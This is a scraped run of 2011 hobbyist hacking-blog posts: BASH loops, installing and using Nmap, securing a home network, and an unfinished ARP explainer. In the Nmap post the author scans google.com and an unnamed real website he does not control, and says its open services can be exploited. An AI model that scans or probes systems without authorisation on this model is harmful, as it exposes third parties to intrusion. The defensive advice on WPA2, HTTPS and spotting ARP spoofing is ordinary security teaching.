Depending on how many elses you wish you add, there are many other ways to do this in an easier fashion that I will cover later, as well.<br />
<div style="text-align: center;"><span class="Apple-style-span" style="font-size: large; font-weight: bold; text-decoration: underline;">For Loops:</span></div><div style="text-align: left;"><br />
</div><div style="text-align: left;">Now again, if you've had any experience with programming, for loops shouldn't be anything new to you; however, for loops in BASH have a little different of a syntax. This time, I'm going to go over the syntax of a for loop in BASH, then explain the uses for our new readers and how these are one of the most important aspects of programming.</div>In BASH, there are a few ways to do for loops, which is interesting because in most programming languages there's one basic syntax. Here are a few ways to do them.<br />
<br />
My favorite way to do for loops is this:<br />
<br />
<i>for var in {1..10}</i><br />
<i>do</i><br />
<i> echo "the variable var is $var"</i><br />
<i>done # closes for loop</i><br />
<i><br />
</i><br />
If you're used to Java or C++ or another high level programming language and their for loops, you can use this syntax:<br />
<br />
<i>for (( i=0; i<10; i++ )) # note that spaces are a MUST (BASH is weird like this)</i><br />
<i>do</i><br />
<i> echo "increment variable i is $i"</i><br />
<i>done # closes for loop</i><br />
<i><br />
</i><br />
You can add a "break" command inside the loop, which I would recommend throwing into an "if then" statement for error or input checking.<br />
As well as the break command, you can have a "continue" command which automatically skips to the next iteration; meaning if i is equal to 5, but whatever you want has already been completed, you can have an if statement check your needs then simply add the "continue" statement and it will go to the 6th iteration.<br />
This gets into bigger and better scripts in BASH and can be used quite effectively depending on your scripting needs.<br />
<div style="text-align: center;"><span class="Apple-style-span" style="font-size: large;"><b><u>While Do Loops and Do Until Loops:</u></b></span></div><div style="text-align: center;"><b><u><br />
</u></b></div><div style="text-align: left;">Another basic and important programming syntax to understand is Do->While loops, which can be either do while or do until. I'll explain both and their uses.<br />
<br />
The basic while loop syntax is as follows:<br />
<br />
<i>while [ expression ]; do</i><br />
<i><< Block >></i><br />
<i>done</i><br />
<br />
Note that the squared parenthesis must <i></i>have spaces between the tested expression or it won't compile and run.<br />
<br />
A do until loop does the block statement UNTIL the expression evaluates to true, which is the opposite of the while do loop.<br />
Here is an example:<br />
<br />
<i>until [ expression ]; do</i><br />
<i><< Block >></i><br />
<i>done</i><br />
<i><br />
</i><br />
So if you have the expression "i = 0" and the variable is prompted every time the loop goes through, if we used a while loop, the variable would only continue if the use input "0" every time, but if we used an "until," the loop would continue UNTIL i equals 0, meaning that ANY other number would continue the loop other than 0.</div></div>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-16730363597146822122011-07-21T23:33:00.013-04:002022-12-20T10:46:25.243-05:00Installing and using Nmap [Linux/Windows]<div dir="ltr" style="text-align: left;" trbidi="on">I'm afraid I've been very busy lately with a new job working overnights and figuring out all my college needs for moving in next month, but I've been doing a lot of research and reading on a few interesting topics so hopefully the next few posts will be very interesting.<br />
<div>I've also updated a few of my posts including my <a href="http://www.hackavision.com/2011/07/sniffing-passwords-over-wifi-connection.html">wifi sniffing</a> and <a href="http://www.hackavision.com/2011/07/securing-your-personal-home-network.html">securing your home network</a> posts, so check those out!</div><div><br />
</div><div>Today's post is about one of the most important netsec tools you will have in your arsenal. This program is called Nmap and is a free, open-source network auditing and security tool that we will use quite often while looking for vulnerabilities on networks.</div><div><br />
</div><div>I will be explaining how to install and do some basic usage on Linux AND Windows (yay Windows!). I will be using my Backtrack 5 for Linux and Windows XP and hopefully get a Vista/Win7 part up as well.<br />
<a name='more'></a><b><u><span class="Apple-style-span" style="font-size: x-large;"><br />
Installing Nmap on Linux:</span></u></b></div><div><b><u><span class="Apple-style-span" style="font-size: x-large;"><br />
</span></u></b></div><div><div style="text-align: left;"><span class="Apple-style-span">If you're using Backtrack 5, it should be automatically installed and updated, but if for some reason it's not you can follow this walk-through for non-BT users.</span></div><span class="Apple-style-span"><br />
Installing it with the terminal or command prompt is as easy as running one command: "sudo apt-get install nmap" and remember, the "sudo" super user do command is only necessary if you're not the root or a super user already.<br />
<br />
If this doesn't work for you for some reason, you can do the following (exactly like how we've installing SSLStrip and Ettercap)...</span><span class="Apple-style-span"><br />
</span><br />
<ol style="text-align: left;"><li><span class="Apple-style-span">Download <a href="http://nmap.org/dist/nmap-5.51.tgz">this file</a> to your Linux desktop or home.</span></li>
<li><span class="Apple-style-span">Navigate to that location in your terminal using the "cd" command.</span></li>
<li><span class="Apple-style-span">Issue the command "tar xvf [file name]" where the file name in this case is "nmap-5.51.tar.bz2"</span></li>
<li><span class="Apple-style-span">Then type the command "cd </span><span class="Apple-style-span">nmap-5.51"</span></li>
<li><span class="Apple-style-span">Next, type "./configure"</span></li>
<li><span class="Apple-style-span">Then "make"</span></li>
<li><span class="Apple-style-span">Then finally "make install"</span></li>
<ol style="text-align: left;"><li><span class="Apple-style-span">If this command doesn't work, make sure you're the super user (you can type su [username] to do this or type "sudo" before the command).</span><span class="Apple-style-span"> </span><span class="Apple-style-span"> </span> <span class="Apple-style-span"><br />
</span></li>
</ol></ol></div><div><span style="font-size: small;">This should correctly install version 5.51 of nmap. You can now use this amazing tool. Scroll down to view a basic tutorial and overview on some of its usages.</span><span style="font-size: small;"><br />
</span><br />
<b><u><span class="Apple-style-span" style="font-size: x-large;">Installing Nmap on Windows XP, Vista, 7, NT, and 2k:</span></u></b><br />
<span style="font-size: small;"><br />
Every Windows should have the same installation, but mine will be done on XP since I don't have Vista or 7 available at the moment, so if there's any complications with Vista, 7, or another version tell me and I'll try to help you with it.<br />
<br />
Lets start, first, download <a href="http://nmap.org/dist/nmap-5.51-setup.exe">this file</a> and save it to your computer, it should only take a few seconds to complete.<br />
Next, double click the file so it opens (as an exe does) and click through the first page by hitting "I agree."<br />
The next window should have all the options selected but if they aren't, select them all and hit next.<br />
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFZ_xsKPAJXRWMWuZYuqUO2c36nImL-3r1ykE_hFMmX4BWVXx5pe5Uv0PoWbFYfwjW-MM0MGlYkqVovUlK25d3wwYt2v3T1uq_nR510V_EDfmz9fBsFdtwrKSTdYEJrAjyn4ZZj2N0JnI/s1600/1+-+first+page.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="312" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFZ_xsKPAJXRWMWuZYuqUO2c36nImL-3r1ykE_hFMmX4BWVXx5pe5Uv0PoWbFYfwjW-MM0MGlYkqVovUlK25d3wwYt2v3T1uq_nR510V_EDfmz9fBsFdtwrKSTdYEJrAjyn4ZZj2N0JnI/s400/1+-+first+page.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Make sure all of them are selected.</td></tr>
</tbody></table><br />
<span style="font-size: small;">After you hit next, it should prompt where to install. The default location is C:\Program Files\Nmap\ which is fine. Hit the install key and let it do its thing.</span><br />
<span style="font-size: small;">If you have a different version already installed, it will prompt you with the following message:</span><span style="font-size: small;"> </span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgup7Dv3iHK1-jTLvy822EkkHl6Waj56q1EZwOBixkWZVwKDdnolaYYOIm2trTLwxdvGCK5k5a5aSaNGnbkM_eMDofiy0PqcEgJXQlCJd-9F8NqoOhkE8j0tXDrgzvQzf1n8lyq_8gD_LQ/s1600/2+-+new+version.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="101" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgup7Dv3iHK1-jTLvy822EkkHl6Waj56q1EZwOBixkWZVwKDdnolaYYOIm2trTLwxdvGCK5k5a5aSaNGnbkM_eMDofiy0PqcEgJXQlCJd-9F8NqoOhkE8j0tXDrgzvQzf1n8lyq_8gD_LQ/s400/2+-+new+version.JPG" width="400" /></a><span style="font-size: small;"><br />
</span><b><u><span class="Apple-style-span" style="font-size: x-large;"> </span></u></b></div></div><div><span style="font-size: small;"><br />
Hit the "yes" prompt and continue on. It will ask you to un-install the older version first and you should do so by hitting "uninstall." It will then ask you to install it again (just hit next and install it again).<br />
After it's all done, it will come up with the following window:</span><br />
<br />
<div class="separator" style="clear: both; text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1HkeIjMI1xlfvUMhpnQlq7rF1m507Ao14j9Tygz6iOlBd7HhhXIZmqSovHW2wxLAgY-SQWvNlDC5G0uuZyPz0RgDX8oJ-E_UBSzOxE9UEO9g2A6me0QaZXX-Y1Ib4VFbfL1qbu1SDP4g/s1600/3+-+open+nmap.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="310" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj1HkeIjMI1xlfvUMhpnQlq7rF1m507Ao14j9Tygz6iOlBd7HhhXIZmqSovHW2wxLAgY-SQWvNlDC5G0uuZyPz0RgDX8oJ-E_UBSzOxE9UEO9g2A6me0QaZXX-Y1Ib4VFbfL1qbu1SDP4g/s400/3+-+open+nmap.JPG" width="400" /></a> </div><br />
<span style="font-size: small;">I would suggest keeping the "start WinPcap service at startup" checked, but if you like a clean startup when loading your computer, turn it off.<br />
</span><br />
<span style="font-size: small;">It should be all ready to load, hit the finish key and go to your desktop to open it (double click the file of course to open it), it will be called "Nmap - Zenmap GUI"</span><br />
<span style="font-size: small;">Zenmap is the GUI (graphical user interface) version of Nmap. When we're on Linux we will be using both, but I prefer the command prompt (terminal use) version over the GUI.<br />
</span><br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGd1CSPRYGw3J0jh1WdQN3yXRyQeXsHd76WK80m16eqk_OeSnGmotc5N8CG_TPllEWVLKzOQM3ikGcPqCPYiEdSHJFhN2DXjaWBLlLxt_Qq2NyDjxlPH0pGieu1_x7QUQwyIc5ccpQKWE/s1600/4+-+zenmap+icon.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="368" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjGd1CSPRYGw3J0jh1WdQN3yXRyQeXsHd76WK80m16eqk_OeSnGmotc5N8CG_TPllEWVLKzOQM3ikGcPqCPYiEdSHJFhN2DXjaWBLlLxt_Qq2NyDjxlPH0pGieu1_x7QUQwyIc5ccpQKWE/s400/4+-+zenmap+icon.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">A screenshot of the shortcut on my desktop - Windows XP SP3</td></tr>
</tbody></table><span style="font-size: small;">Scroll down and lets start some basic usage of Zenmap on our Windows system!<br />
<br />
</span></div><u><b><span style="font-size: x-large;">Using Nmap on Linux:</span></b></u><span style="font-size: x-large;"><span style="font-size: small;"><br />
First, lets start off with some basic usage in the terminal using nmap to scan some nodes and websites.</span></span><span style="font-size: x-large;"><span style="font-size: small;"><br />
Open up a new terminal and issue the command "nmap google.com" and review the results.<br />
</span></span><br />
<div align="left" class="separator" style="clear: both; text-align: center;"></div><div align="left" class="separator" style="clear: both; text-align: center;"></div><div align="left" class="separator" style="clear: both; text-align: center;"></div><div align="left" class="separator" style="clear: both; text-align: center;"><br />
</div> <a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXidXXGUFJwNkK7d4-Pj3WPpH6H3xsH_Vjju-H46rwetR6uOAcMDb97pYtJYaqFnnhrr4B6sMK5UFLnkNU4yh0Bmjpm9ibQgs0EYfVESVTOEKWMhSHNSIo6Km6gNrmZxmoFEKH0sHdR-Q/s1600/1+-+nmap+google+basic.jpeg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="326" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiXidXXGUFJwNkK7d4-Pj3WPpH6H3xsH_Vjju-H46rwetR6uOAcMDb97pYtJYaqFnnhrr4B6sMK5UFLnkNU4yh0Bmjpm9ibQgs0EYfVESVTOEKWMhSHNSIo6Km6gNrmZxmoFEKH0sHdR-Q/s400/1+-+nmap+google+basic.jpeg" width="400" /></a><br />
<div align="left" class="separator" style="clear: both; text-align: center;"><br />
</div><div align="left" class="separator" style="clear: both; text-align: center;"><br />
</div>Now, try running that command with the "verbose" option on (verbose means "wordy" or in layman's terms more output).<br />
<br />
Run the command "nmap -v google.com" and watch the difference in output.<br />
<span style="font-size: x-large;"><b><u>Using Nmap on Windows:</u></b></span><span style="font-size: x-large;"> </span><br />
<blockquote class=""><span style="font-size: small;">Now it's time to open up Nmap and start some basic scanning.</span>Double click on your icon to open up the program and it will look like this on Windows XP:</blockquote><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkcVT925EdNkqFAGMRrPEKAwXwNeks0EjIkYk2ESN-xYoyl8L_aH29_dnTajT5EafX-MCtPlC3OUatRIArwLnFDgh3KDPqE03Q3nApNw8nxfZ1jLn0TANm-_UtZO9cO_9rahZx9QBvG9w/s1600/5+-+opening+nmap.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="333" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhkcVT925EdNkqFAGMRrPEKAwXwNeks0EjIkYk2ESN-xYoyl8L_aH29_dnTajT5EafX-MCtPlC3OUatRIArwLnFDgh3KDPqE03Q3nApNw8nxfZ1jLn0TANm-_UtZO9cO_9rahZx9QBvG9w/s400/5+-+opening+nmap.JPG" width="400" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Nmap opening screen.</td></tr>
</tbody></table> The "target" is obviously our target for the scan we want, the "profile" is the type of scan which changes the "command" line accordingly. I'll describe what each option does and what the profiles are used for, but if you use the Linux version, the options in the command line are the same.<br />
<br />
You can see the "hosts" and "services" tabs which we will be using when scanning multiple targets and when saving and reopening old scans.<br />
Also you can see the "nmap output" which is a nice output view of what nmap is doing/has done, similar to what you would see in the command prompt in Linx.<br />
The ports/hosts tab shows the open/filtered ports after completing a test, and we will be using this tab later.<br />
The "topology" is an interesting tab that shows you traceroute and the location of each nmap scan.<br />
The host details is important since it tells us what the host is running and other useful information we will be using.<br />
The "scans" tab is our scans that we've run this session. It's useful if you want to scan multiple targets every use and want to look back at the results.<br />
<br />
After that quick explanation lets run a basic scan and view the results.<br />
<br />
Type into the "target" "www.google.com" and leave "intense scan" on then click the "scan" button to start.<br />
When we start, it should start outputting text such as "initiating scan" then "scanning www.google.com" and google's IP address and a bunch more stuff. Here's what mine looks like at the bottom of the page since there's quite a bit of output.<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibfdvOxnYXoQSqiY7qYkb_LxPRFSfyxr3sVXm_qJEdJ7bwG1Pf9avQojdZgGXYLHojI6DlapxE_tbFF0-38M9qXFdXz7rGNklYsErU2P9jlmqhyMJdQQlZEYhMXp_wDMPLbgJ7mkuP08o/s1600/6+-+nmap+scan+intense+with+verbose.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEibfdvOxnYXoQSqiY7qYkb_LxPRFSfyxr3sVXm_qJEdJ7bwG1Pf9avQojdZgGXYLHojI6DlapxE_tbFF0-38M9qXFdXz7rGNklYsErU2P9jlmqhyMJdQQlZEYhMXp_wDMPLbgJ7mkuP08o/s400/6+-+nmap+scan+intense+with+verbose.JPG" width="392" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Verbose Google.com Nmap scan</td></tr>
</tbody></table>Whoa. That's a lot of gibberish to most of you I assume, so here's the quick rundown.<br />
About 1/5th of the way down, after the "PORT STATE SERVICE VERSION" line, it lists "80/tcp open http Google http 2.0 (GFE)"<br />
Well, what's all that mean? It means that the port 80 on tcp (there are two types of ports, TCP and UDP ports if you didn't know) is open, and that port is running their HTTP server and it is running "Google http 2.0"<br />
Below that it states that 113 is closed, and 443 is open as well. <br />
Well, 80 is the classic HTTP (hypertext transfer protocol) which is how we connect to google.com and all other sites, and 443 is the HTTPS which is the "secure" version of websites (gmail uses HTTPS rather than HTTP as we saw in the Wifi-sniffing tutorial).<br />
Since Google only has two ports open, this doesn't give us much information since we already KNOW those are open by connecting to google.com and gmail.com (a HTTP version and an HTTPS version).<br />
<br />
At the bottom is a "traceroute" which counts the "hops" or how many nodes away it took to connect to Google.com. Since I live in Upstate New York, you can see the first hop address is "cable1-0.albynygnv-ar401.nyroc.rr.com (67.252.0.1)" which means my computer sent packets to that IP address first, which then routed them to the second, third, fourth, fifth, sixth and finally the seventh hop which then sent it to Google.com, completing the "route" which we traced (hence "traceroute").<br />
<br />
Lets make nmap output a little less output that may confuse you. In the "command" line you may have noticed the "-v" option which stands for the verbose option which means "wordy"<br />
With this option on, nmap gives us more output versus the normal option of having it not on, and many people appreciate this. For now, lets turn it off by selecting the "-v" and deleting it. The "profile" should turn blank but don't worry, it turned blank because we're using a "custom" command. Try rerunning the scan after deleting that section. The output for me is below.<br />
<br />
<div class="separator" style="clear: both; text-align: center;"></div><table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_MC2pb3getQ9yXRxMS0QoNQXWwC04tMzr7QaefdCGcwllhig7rTBjeffhy2uc8YmJ-ElxNnh29RUpV4lP0Na0haRZ5rVCNUSbxS7xmHUG0GQZuiOC0Oh9CM2nn9u0gskLoX8yQ5QKhMc/s1600/7+-+nmap+scan+intense+without+verbose.JPG" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEg_MC2pb3getQ9yXRxMS0QoNQXWwC04tMzr7QaefdCGcwllhig7rTBjeffhy2uc8YmJ-ElxNnh29RUpV4lP0Na0haRZ5rVCNUSbxS7xmHUG0GQZuiOC0Oh9CM2nn9u0gskLoX8yQ5QKhMc/s400/7+-+nmap+scan+intense+without+verbose.JPG" width="392" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Non-verbose Google.com Nmap scan</td></tr>
</tbody></table>Well that seems a lot easier to digest, right? There's still a lot of information you won't understand but all the basics we went over before are still there, it's just a sweeter and shorter output. Verbose has its time and place and I definitely suggest having it on if you can handle it, but at first try having it off to de-clutter your output.<br />
<br />
Lets try scanning a REAL target that isn't as secure as Google. I'll be editing out the website I'm scanning so not to cause any security issues with them, but it will still give a good output for you to review.<br />
<br />
Here's my output with verbose off for the website I'm scanning (website name and IPs edited):<br />
<br />
<table align="center" cellpadding="0" cellspacing="0" class="tr-caption-container" style="margin-left: auto; margin-right: auto; text-align: center;"><tbody>
<tr><td style="text-align: center;"><a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjS-7wWYTp2qKJMnfDTIvwWJF1EqU1dNr9hZ7-AuYb4yIS9d6D4yhIe49EdAuGHGj0UIbHp3UOrGEavHvXimb7XIsQiY_g4BKYjvcnrTf2VtPhHprfYboht3-dbmkO5DEZXqOKKnhpSI4/s1600/9+-+nmap+scan+intense+without+verbose+on+website.jpg" imageanchor="1" style="margin-left: auto; margin-right: auto;"><img border="0" height="400" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjjS-7wWYTp2qKJMnfDTIvwWJF1EqU1dNr9hZ7-AuYb4yIS9d6D4yhIe49EdAuGHGj0UIbHp3UOrGEavHvXimb7XIsQiY_g4BKYjvcnrTf2VtPhHprfYboht3-dbmkO5DEZXqOKKnhpSI4/s400/9+-+nmap+scan+intense+without+verbose+on+website.jpg" width="388" /></a></td></tr>
<tr><td class="tr-caption" style="text-align: center;">Non-verbose website Nmap scan</td></tr>
</tbody></table>Now there's a good scan. We can see that they have their FTP, SSH, SMTP, POP3 and other ports open with running applications!<br />
FTP is a commonly used protocol called File Transport Protocol and can be exploited to gain access to sensitive information stored on the server.<br />
SSH is of course the Secure Shell server and can be used to gain root access to the server and a slew of interesting things.<br />
SMTP is the Simple Mail Transport Protocol and is used for web-mail and can, of course be exploited to gain access to mail and other things.<br />
POP3 is the Post Office Protocol and is a way for clients to retrieve mail from the server. Guess what we can do with it? Exploit it to gain access to their mail servers.<br />
The other ports are interesting, too, and can also be exploited in various ways.<br />
<br />
Hopefully I'll be able to show you exploits pertaining to these types of services in the near future, but they will probably be on insecure boxes I've loaded myself and not REAL targets, since I'm not experienced enough to gain access to updated and regularly scanned targets... yet.<br />
<br />
Now, I would show you a localhost (your computer) ping, but unfortunately the Windows version of Nmap has issues with this, so if you want to scan your own computer and see what ports are open and how to secure them, check out the Linux version of Nmap and my tutorial above for this information.<br />
<br />
<strike>I was also trying to set up my vulnerable VMWare to ping from my machine but apparently I can't since it's still considered the "localhost" (which is my machine), to any of my more advanced readers, is there anyway around this so I can Nmap my VMWare from my XP? I'll be doing this from my Linxtop in the above tutorial in Linux, so you can view it there, but for now I can't show a more interesting Nmap scan, sorry!</strike>I figured out my problem... and it was stupidly simple, but I've been working and tired a lot so it must have slipped through my mind. I'll hopefully have a more in depth tutorial up soon =D<strike><br />
</strike><br />
<div><b><u><span class="Apple-style-span" style="font-size: x-large;"> </span></u></b></div></div>Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-19761913938794442972011-07-04T14:49:00.008-04:002022-12-14T01:12:39.936-05:00Securing your personal home network [Information]<div dir="ltr" style="text-align: left;" trbidi="on">
<div>
<div dir="ltr" style="text-align: left;" trbidi="on">
Today's the 4th of July so I'm throwing out a quick post since it's been a few days, but I hope all my readers will be happy with another informational piece about securing your own network since, after all, that's what netsec is about!<br>
<br>
Below is a simple guide to getting the most security out of your network to protect your information and the users of your network's information.<br>
<br>
<a name="more"></a><br>
<br>
<a href="http://www.blogger.com/post-edit.g?blogID=4181939565976903382&postID=1976191393879444297&from=pencil" name="more"></a><span style="font-size: large;"><b>Setting up your router encryption:</b></span><br>
<blockquote>
<span style="font-size: small;">If you've read my <a href="http://hackavision.blogspot.com/2011/06/cracking-wepwpa2-networks-with-aircrack.html">WEP/WPA2 cracking guide</a></span>, then you understand how fragile WEP encryption is. In my tutorial I also explained how to crack WPA1/2 passwords, but explained that the passkey must be in the dictionary that you specified whilst entering the "aircrack" command.<br>
<br>
When you're selecting which encryption to use, don't even consider WEP. It can be broken in 30 seconds on a half-decent computer. I've successfully broken WEP in under two minutes sitting in a bathroom on a small dell laptop.<br>
<br>
As for what TO use, choose either WPA or WPA2. WPA2 has some slight upgrades from it's predecessor WPA, but there is no noticeable difference whilst cracking WPA2 versus WPA.<br>
<br>
When setting up your network password there are some obvious things that you don't want to set it as, such as "password," "admin," "12345," "qwerty," or anything so simple a 10 word passkey list could find.<br>
Your best bet is setting your password with a length <i>AT LEAST</i> 8. Don't just use letters and a number after. Switch it up with symbols too. For instance, an almost unbreakable 8-length password would be "Z9t*F3&w" since it's a completely random selection of letters, numbers, and symbols and definitely would not exist in any normal dictionary or common password list.<br>
If you get into the teens of length, your password becomes exponentially more secure.<br>
If you have a password with a length of 13, assuming we only use numbers 0-9, all the symbols on the top row of our keyboard "`~!@#$%^&*)(_+-=" and a-z and A-Z, if my math is correct that is 78 different combinations per spot, which means that the different possibilities would be 13^78 or 7.71936328 × 10^<span style="font-size: small;">86 which would take much longer than anyone's lifetime to crack.</span><br>
These are some simple tips to making your network unbreakable by hackers outside your network, but what about if a hacker is already inside your network?</blockquote>
<span style="font-size: large;"><b>Safe Internet usage:</b></span><br>
<blockquote>
If you have any experience with <a href="http://hackavision.blogspot.com/2011/06/installing-ettercap-linux.html">Ettercap</a> then you know how easy it is to view a person's traffic and steal valuable information such as passwords and logins. So to counteract this, we as Internet and network users need to use smart surfing and watch what websites we go to as well as be aware of the dangers out there like certain pop-ups installing viruses and malware into our computers.<br>
<br>
I'm sure a lot of you have seen certain pop-ups that say something like "your computer is infected, run a free test now!"</blockquote>
<div class="separator" style="clear: both; text-align: center;">
</div>
<blockquote>
These images require a user to click "yes" or even "no" or the exit button in the top right or left (depicted with an X), then once this action has occurred, malicious software is installed into your computer and a fake virus scan runs showing that you have certain viruses, where the <i>ACTUAL</i> virus is the software itself! <br>
To defend against these "phishing" attacks (the word phishing gets its name from fishing where a person throws out a hook enough times, which are the scams, and someone will bite) is to know what's fake and what's not. Know your anti-virus and don't click on popups while browsing the Internet. If you're using Firefox, install Adblock and Noscript, but remember to allow sites you frequent or they may not work correctly. Chrome and Opera also support their own versions of these, so check out the "addon" page for each respective browser. <br>
Being aware of these phishing and other phishing attacks like email spam are important ways to having top notch security.<br>
<br>
We must also be aware of unauthorized users in our networks, whether it be in an open network as a guest, or a malicious hacker in our (hopefully) protected network. <br>
Ways to defend against attacks from INSIDE our network include using "HTTPS" sites to log in with sensitive information, instead of the classic "HTTP" type of authentication. <br>
HTTP means hypertext transfer protocol, and the S on the end of HTTPS means "secure." </blockquote>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja-pipmQtQNvbX7IXZho0xyjpKkdE01RfUKPDaeAAoFvXFODqVM7mdl6-sqo1LmpnwE1zKQo2OnEvfi53ERk_9gz4UsIyDqfNxweid6KRc7-Y_EVJilRnFoDT2_juWXu0XX4V_bL3xng0/s1600/HTTPS.JPG" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="191" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEja-pipmQtQNvbX7IXZho0xyjpKkdE01RfUKPDaeAAoFvXFODqVM7mdl6-sqo1LmpnwE1zKQo2OnEvfi53ERk_9gz4UsIyDqfNxweid6KRc7-Y_EVJilRnFoDT2_juWXu0XX4V_bL3xng0/s400/HTTPS.JPG" width="400"></a></div>
<div class="separator" style="clear: both; text-align: center;">
<br></div>
<blockquote>
Even if all your sensitive information is processed through HTTPS, there'sways for hackers to disable the secure connection and steal your information regardless. Using this method of logging in adds another layer of security to our everyday Internet usage, but can still be disabled and worked around as you can see in my post involving Ettercap, SSLStrip, and ARP spoofing to steal secure passwords.</blockquote>
<blockquote>
How you can attempt to defend against attacks like the one I explained on my password sniffing post is to make sure you're not being redirected away from HTTPS sites to their unsecure HTTP counterparts. If this is happening I would suggest reviewing the nodes on your network because someone is running a redirection on you with SSLStrip and trying to steal your information!</blockquote>
<blockquote>
Another way to detect this attack is to regularly check your network speeds. A side effect of a ARP spoofing redirection attack is that it bogs down your network, even DoSing (denial of service attacking) the network if the computer that is redirecting traffic is slow or cant handle all the packets being passed through. I've noticed another side effect of these attacks that can be watched for and that is, when attempting to log onto HTTPS sites, it redirects you (which isnt very easy to notice if you're a common user), but then doesn't allow you to log in (it just reloads the login page). This is because the forwarding breaks the login page and doesn't allow you to pass your credentials in.</blockquote>
<blockquote>
</blockquote>
<blockquote>
</blockquote>
</div>
</div>
</div>
Marshallhttp://www.blogger.com/profile/04409832157088422324noreply@blogger.comtag:blogger.com,1999:blog-4181939565976903382.post-35107528624407728862011-07-01T12:14:00.000-04:002011-07-01T12:14:35.508-04:00What is ARP? [Information]<div dir="ltr" style="text-align: left;" trbidi="on"> Since I've explained now how to get Backtrack 5, if you're still not on Linux then go <a href="http://hackavision.blogspot.com/2011/06/so-you-want-to-use-backtrack-5.html">install it now</a> before all the fun stuff starts!<br />
As for today's post I'll be explaining an important part about netsec: Address Resolution Protocol.<br />
<br />
Understanding ARP, or Address Resolution Protocol, is a key part in understanding how networks communicate.<br />
<br />
<a name='more'></a>You can think of ARP as a phonebook for computers on a network.<br />
Say the computer "Bob-PC" wants to send a message to "Meg-Laptop" but only has its local IP address. Computers require the "physical" address or MAC (Media Access Control) address to send messages, so Bob's computer needs to find out Meg's MAC. How would it do this?<br />
Well, what Bob's computer does is checks its own "ARP cache" which is a list of computers it has stored with their IPs (such as 192.168.0.105) and MAC address (such as 00:1C:F2:D2:55), and if it finds the corresponding physical (MAC) address to the IP address it has for Meg's laptop, its all good to go!<br />
<br />
But what if Bob's PC's ARP cache doesn't have Meg's laptop listed?<br />
Well, ARP has this sorted out. It sends out a "broadcast ARP message" to the network saying "hey, who is 192.168.0.105 (Megs-Laptop)?" and receives a response from Meg's laptop saying "hey, that's me! My MAC address is 00:1C:F2:D2:55!"<br />
Bob's PC then stores that information in its ARP cache for later use.<br />
<br />
How hackers can use this to infiltrate systems is doing something called "ARP poisoning" and can be explained using this image from Wikipedia:<br />
